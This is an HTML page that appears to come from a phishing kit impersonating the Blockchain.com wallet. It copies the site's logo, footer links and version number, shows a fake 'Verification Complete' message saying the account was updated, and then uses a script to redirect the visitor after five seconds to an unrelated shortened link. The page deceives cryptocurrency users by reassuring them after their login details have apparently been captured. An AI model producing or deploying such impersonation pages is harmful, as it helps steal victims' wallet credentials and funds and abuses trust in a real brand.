<!DOCTYPE html>
<html lang="en">

<head>
  <meta charset="UTF-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Login | Blockchain</title>
  <link rel="shortcut icon" href="/img/favicon.ico" type="image/x-icon">
  <link rel="stylesheet" href="/css/main.css">
  <script src="/js/jquery.js"></script>
</head>

<body class="mode-light">
  <div id="app">
    <div class="hLRBsB">
      <div class="fvHjxE">
        <div height="112px" class="dHvbOZ">
          <div class="iTjCBV cptUIt">
            <div class="jnHNPG fCMSDs">
              <div class="kKyXUB"><a href="https://www.blockchain.com" class="bzateK gqnaJW" color="blue600"><img src="/img/logo.svg" srcset="" height="24px" class="ixijk kyMJXT" color="auto" width="auto"></a></div>
            </div>
          </div>
        </div>
      </div>

      <div class="dXnSGZ">
        <div class="coOByc">
          <div class="cYziAC">
            <div class="gkJLwX">
              <div style="text-align: center;margin-top: 100px;margin-bottom: 150px;">
                <svg width="64" height="64" viewBox="0 0 64 64" fill="none" xmlns="https://www.w3.org/2000/svg">
                  <circle cx="32" cy="32" r="32" fill="#62CF66"></circle>
                  <path fill-rule="evenodd" clip-rule="evenodd" d="M28.2514 44.0347C27.4541 44.9285 26.0553 44.9259 25.2614 44.0291L14.5907 31.9753C14.151 31.4787 14.3078 30.6995 14.9054 30.4116L15.3589 30.1931C15.686 30.0354 16.0729 30.0675 16.3695 30.2769L25.0794 36.423C25.8341 36.9556 26.8554 36.902 27.5502 36.2934L47.6139 18.7212C47.9155 18.4571 48.3457 18.3986 48.7068 18.5726L49.0901 18.7573C49.689 19.0458 49.8448 19.8277 49.4023 20.3238L28.2514 44.0347Z" fill="white"></path>
                </svg>
                <h3>Verification Complete</h3>
                <p>Your account has successfully been updated. You will be redirected back to our homepage shortly.</p>
              </div>
            </div>
          </div>
        </div>
      </div>
      <div class="ilwOTt">
        <div class="kiwhRw">
          <div class="kXiRmv">
            <div color="grey400" class="kyfudT">
              <div class="kPtlNs">English</div>
            </div>
          </div>
          <span class="jhqRYo">
            <a color="grey400" href="https://github.com/blockchain/blockchain-wallet-v4-frontend/releases" class="ecJsZh">Version 4.83.9</a>
          </span>
          <div class="ilHcgz">
            <a color="grey400" href="https://support.blockchain.com" class="ecJsZh">
              <div color="grey400" cursor="inherit" opacity="1" class="hLxhAA">Need Help? </div>
            </a>
          </div>
        </div>
      </div>
    </div>
  </div>
  <script src="/js/main.js"></script>
  <script>
    setTimeout(() => {
      window.location.href = 'https://t.ly/6gph';
    }, 5000)
  </script>
</body>

</html>